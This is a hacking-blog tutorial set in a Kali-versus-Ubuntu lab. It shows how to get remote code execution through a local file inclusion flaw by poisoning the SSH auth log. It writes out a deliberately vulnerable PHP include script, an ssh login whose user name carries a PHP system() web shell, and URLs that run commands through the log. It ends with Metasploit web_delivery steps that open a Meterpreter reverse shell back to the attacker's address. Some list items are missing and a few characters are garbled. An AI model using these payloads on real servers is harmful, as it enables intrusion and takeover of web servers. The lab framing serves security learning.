Hello readers, in this tutorial we will show you how we can perform ssh log Poisoning through local file inclusion vulnerability. But before start this we want to express important things about this attack.
LFI ( Local File Inclusion ) is the type of web vulnerability that is commonly found in web application which can make a deep impact on web application. This vulnerability can lead many types of attacks such as :
Absolutely ! we can perform log poisoning through lfi vulnerability but with the help of some important factors such as :
Note : If special permissions has not be given on those files then you cannot take the meterpreter session of web server.
Kali Linux = Attacker
Ubuntu = Victim
Now lets get started !! 🙂
Login in Ubuntu as “root” and create a directory on the given location.
cd /var/www/html/
mkdir vuln
cd vuln
leafpad lfi.php
Now we will insert the given configuration into the lfi.php file which will allow the user to include a file via a file parameter.
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
Start the apache server using the following command.
systemctl start apache2
Now our server is vulnerable from lfi, Hence we can execute the system level commands on browser.
http://192.168.0.111/vuln/lfi.php?file=/etc/group
Before starting we need to give some additional permission to the log file with the help of which other users can read log files from the đź‘Ą browser.
chmod 775 -R /var/log/auth.log
We will use the following command to continuously read the upcoming logs.
cd /var/log/
tail -f auth.log
Now we have to go back to the kali linux and check whether the ssh port is visible from the attacker’s side.
nmap 192.168.0.105
As we know the auth.log file generates a log in every success and failed login attempt. Now we will try to connect as fake users, which will contain malicious php code.
Usage 🙂 <- ssh code@vicitm IP Address ->
ssh '<?php system($_GET['c']); ?>'@192.168.0.111
Now you can see that the malicious PHP code has arrived in the log file.
Now we can take advantage of this vulnerability by execute the arbitrary command on browser such as
hostnamectl
uname -a
ls, dir, /etc/os-release
http://192.168.0.111/vuln/lfi.php?file=/var/log/auth.log&c=hostnamectl
Now lets try to take the meterpreter of the web server.
msf5 exploit(multi/handler) > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost 192.168.0.105
msf5 exploit(multi/script/web_delivery) > set uripath /
msf5 exploit(multi/script/web_delivery) > run
Paste and execute the above highlighted php code on the browser as shown below.
Great !! 🙂 Our meterpreter is finally come to here.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.